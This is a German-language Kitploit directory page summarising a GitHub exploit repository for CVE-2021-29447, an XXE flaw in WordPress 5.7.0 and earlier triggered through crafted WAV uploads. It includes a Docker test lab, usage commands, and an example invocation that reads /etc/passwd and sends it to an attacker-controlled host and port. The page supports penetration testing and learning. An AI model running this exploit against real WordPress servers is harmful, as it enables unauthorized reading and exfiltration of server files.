Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/danilo1992-sys/cve-2021-29447
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubdanilo1992-sys/cve-2021-29447

CVE-2021-29447

Exploit für CVE-2021-29447, eine XXE-Schwachstelle in WordPress 5.7.0 und früher. Generiert bösartige WAV-Payloads, um beliebige Serverdateien über XML-External-Entity-Injection auszulesen. Enthält Docker-Testumgebung.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 5 MonatenNoch nicht geprüft

CVE-2021-29447 - WordPress XXE Vulnerability Exploit

Beschreibung

Dieses Repository enthält einen Exploit für CVE-2021-29447, eine XXE-Schwachstelle (XML External Entity) in WordPress 5.7.0 und früheren Versionen. Die Schwachstelle besteht in der Medienbibliothek, die WAV-Dateien verarbeitet, und ermöglicht es einem Angreifer, beliebige Dateien vom Server zu lesen.

Voraussetzungen

  • Bash
  • Python 3
  • Docker und Docker Compose (zum Starten der Testumgebung)
  • Angreifbarer WordPress-Server (5.7.0 oder niedriger)

Dateien

DateiBeschreibung
CVE-2021-29447.shExploit-Skript, das die WAV-Payload und die bösartige DTD-Datei erzeugt
decode.phpPHP-Skript zum Dekodieren exfiltrierter Daten (base64 + zlib)
docker-compose.ymlDocker-Umgebung mit angreifbarem WordPress für Tests

Verwendung

1. Testumgebung starten

root@kitploit:~
docker-compose up -d

2. Exploit ausführen

root@kitploit:~
chmod +x CVE-2021-29447.sh
./CVE-2021-29447.sh -l <LHOST> -p <LPORT> -f <ziel_datei>

Parameter:

  • -l IP des Angreifers (LHOST)
  • -p Port des Angreifers (LPORT)
  • -f Pfad der zu lesenden Datei auf dem Server
  • -h Hilfe anzeigen

Beispiel:

root@kitploit:~
./CVE-2021-29447.sh -l 192.168.1.100 -p 4444 -f /etc/passwd

3. Daten dekodieren

Die exfiltrierten Daten sind base64-kodiert und mit zlib komprimiert. Zum Dekodieren:

root@kitploit:~
php decode.php

Technik

Der Exploit funktioniert, indem eine externe XXE-Entity in die Metadaten einer WAV-Datei eingefügt wird. Wenn WordPress die Datei verarbeitet, löst der XML-Parser die externe Entity auf, wodurch der Server eine HTTP-Anfrage an den Angreifer-Server sendet, die den Inhalt der Datei kodiert in der URL enthält.

Referenzen

  • CVE-2021-29447
  • WordPress 5.7.0 Security Release

Hinweis

Dieser Code dient ausschließlich zu Bildungszwecken und für autorisierte Penetrationstests. Nicht auf Systemen ohne ausdrückliche Genehmigung verwenden.

Tool herunterladen